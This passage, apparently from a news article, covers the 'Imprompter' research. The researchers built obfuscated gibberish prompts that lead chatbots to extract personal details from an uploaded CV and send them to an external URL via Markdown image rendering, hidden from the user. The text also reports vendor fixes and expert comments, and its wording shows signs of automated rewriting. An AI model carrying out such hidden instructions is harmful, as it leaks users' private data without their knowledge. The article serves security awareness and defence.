The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing that an unintelligible message could do something useful, such as improve their CVs. Researchers point out numerous websites that provide users with suggestions they can utilize. They tested the attack by submitting CVs to chatbots and were able to return personal information contained in the file.
Earlence Fernandesan assistant professor at UCSD who was involved in this work says the attack approach is quite complicated because the obfuscated prompt must identify personal information, create a working URL, utilize Markdown syntax, and not nefariously reveal its behavior to the user. Fernandes compares the attack to malware, citing its ability to perform functions and behave in ways that the user may not have intended.
“Typically with traditional malware you can write a lot of computer code,” Fernandes says. “But what I think is cool here is that it can all be wrapped up in this relatively short, gibberish prompt.”
A Mistral AI spokesperson says the company welcomes security researchers to facilitate it make its products safer for users. “In response to these comments, Mistral AI immediately implemented appropriate remedial measures to rectify the situation,” the spokesperson says. The company has treated the issue as “moderately serious” and its fix blocks the Markdown renderer from working and the ability to call an external URL in the process, meaning loading an external image is not possible.
Fernandes believes that the Mistral AI update is probably one of the first cases where an adversarial nudge example resulted in a fix for the LLM product rather than stopping an attack by filtering out the prompt. However, he believes that limiting the options of LLM agents may be counterproductive in the long run.
Meanwhile, a statement from the creators of ChatGLM shows that the company has security measures that facilitate protect users’ privacy. “Our model is secure and we have always attached great importance to model security and privacy protection,” the statement reads. “By making our model open source, we want to leverage the power of the open source community to better control and analyze all aspects of these models’ capabilities, including their security.”
“High Risk Activities”
Dan McInerneyprincipal threat researcher at security firm Protect AI, says the Imprompter paper “unleashes an algorithm to automatically create hints that can be used to instantly inject to perform a variety of exploits such as PII mining, image misclassification, or malicious use of agent tools LLM can gain access.” While many of the types of attacks included in the study may be similar to previous methods, McInerney says, the algorithm blends them together. “This is more like improving automated LLM attacks than revealing undiscovered threats within them.”
But he adds that as LLM agents become more common and people give them more authority to take action on their behalf, the scope for attacks on them increases. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing before deployment,” McInerney says.
For companies, this means understanding how an AI agent can interact with data and how it can be abused. However, for individuals, as with common security advice, you should consider how much information you give to any AI-powered app or company, and if you utilize tips from the internet, be careful where they come from.
